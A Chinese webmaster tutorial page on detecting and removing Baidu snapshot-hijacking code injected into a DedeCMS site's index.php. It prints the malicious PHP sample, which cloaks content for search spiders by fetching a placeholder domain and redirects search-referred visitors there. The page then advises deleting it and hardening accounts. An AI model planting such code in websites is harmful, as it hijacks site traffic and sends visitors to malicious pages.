您好,欢迎来到菜鸟吧源码网(www.cniao8.com)本站只做精品网站源码!
  • 首 页
  • 会员介绍
  •  

    当前位置:主页 > 站长学堂 > dede教程 >
    织梦dedecms百度快照劫持注入代码防范与清除
    时间:2020-07-31 21:10 作者:菜鸟吧 浏览:收藏 挑错 打印

    织梦百度快照劫持注入代码防范及清除,很多站长做站的过程中,都碰过百度快照被劫持等问题,明明已经修复模板文件了,还是没有更新回正常的快照,以织梦系统为例,


    往往根目录/index.php也被植入恶意代码


    比如:

    1<?php
    2
    3if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo$str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']);
    4
    5foreach ($domain as $v) { if(strpos($fromurl,$v)!==false)
    6
    7{ $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>


    单这段代码就直接把搜索引擎蜘蛛搞晕,带到别的恶意网址去。

    把其删掉,如果在index.php里没找到,但还是存在类似的问题,可以用dw全站搜索下。

    关于防范,空间,ftp账号,权限,后台账号之类都需要设置下,不能太过简单,可以看相关教程《织梦dedecms做到这几条安全设置,网站安全达到99%》

    郑重声明:
    本站所有内容均由互联网收集整理、网友上传,并且以计算机技术研究交流为目的,仅供大家参考、学习,不存在任何商业目的与商业用途。 若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。
    我们不承担任何技术及版权问题,且不对任何资源负法律责任。
    如无法下载,联系站长索要。
    如有侵犯您的版权,请给我们来信:admin@cniao8.com,我们尽快处理。

    DEDECMS批量导入excel数据到后台文章系统的开发教程DEDECMS批量导入excel数据到后台文章系
    织梦中TAG标签字数长度限制解决方法织梦中TAG标签字数长度限制解决方法
    dedecms 问答模块时间显示dedecms 问答模块时间显示